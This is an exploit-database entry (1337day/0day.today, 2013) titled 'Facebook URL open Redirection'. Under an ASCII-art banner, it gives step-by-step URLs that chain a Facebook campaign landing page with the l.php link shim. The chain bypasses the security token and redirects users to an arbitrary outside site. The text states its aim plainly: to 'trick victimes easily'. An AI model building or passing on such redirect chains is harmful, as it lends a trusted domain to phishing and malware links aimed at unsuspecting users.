Facebook URL open Redirection

2013-11-19T00:00:00
ID 1337DAY-ID-21540
Type zdt
Reporter 0day Today Team
Modified 2013-11-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #########################################              1
#0                            We are Inj3ct0r Team                      1
#1               #########################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: Facebook URL open Redirection
# Date: 05/11/2013 - 01/01/1435
# Exploit Author: 1337Day Team
# Vendor Homepage: http://www.facebook.com/      
# Tested on: Mozilla firefox

------------------------------------------------
First let's talk about redirection in facebook when you send  a link to someone in facebook chat or post 
facebook create a security token for every single link , so your link must be like that so you can rediect 
http://www.facebook.com/l.php?u=attackersite.com&h=security token
using this exploit you wont need security token and you can trick victimes easily 

------------------------------------------------
# You go this page 
https://developers.facebook.com/docs/android/
and you copy the link of "download sdk" 

https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://developers.facebook.com/resources/facebook-android-sdk-current.zip


# you keep only this 
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=

# then you add to it 
https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

#so it became like that : 

https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

#  0day.today [2018-03-05]  #